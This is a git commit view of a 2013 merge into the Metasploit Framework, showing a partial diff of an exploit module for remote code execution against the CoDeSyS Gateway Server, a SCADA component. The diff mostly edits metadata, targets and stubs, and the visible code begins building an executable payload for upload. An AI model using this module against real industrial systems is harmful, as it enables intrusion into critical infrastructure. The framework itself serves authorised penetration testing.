Merge branch 'codesys_gateway_server_remote_execution.rb' of github.com:nahualito/metasploit-framework into nahualito-codesys_gateway_server_remote_execution.rb

bug/bundler_fix
sinn3r 2013-03-06 16:15:24 -06:00
commit 7219c7b4aa
1 changed files with 101 additions and 105 deletions

View File

@ -1,5 +1,9 @@
#!/usr/bin/env ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
@ -18,27 +22,25 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Author' =>
[
'Aaron Portnoy <aaron@exodusintel.com>',
'Enrique Sanchez <esanchez@accuvant.com>'
],
'License' => 'MSF_LICENSE',
'References' =>
[
['Exodus Intel Training', '02-2013']
['ICSA-13-050-01', '02-19-2013']
],
'DisclosureDate' => 'Feb 02 2013',
'Platform' => 'win',
'Targets' =>
[
['Windows Universal', { }]
['Windows Universal S3 CoDeSyS < 2.3.9.27', { }]
],
'DefaultTarget' => 0
))
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(1211),
], self.class
)
], self.class)
end
def check
@ -77,14 +79,8 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("File uploaded")
end
def remove_file
end
def read_file
end
def exploit
print_status("- Attempting to communicate with SCADA system #{rhost} on port #{rport}")
print_status("Attempting to communicate with SCADA system #{rhost} on port #{rport}")
# We create an exe payload, we have to get remote execution in 2 steps
exe = generate_payload_exe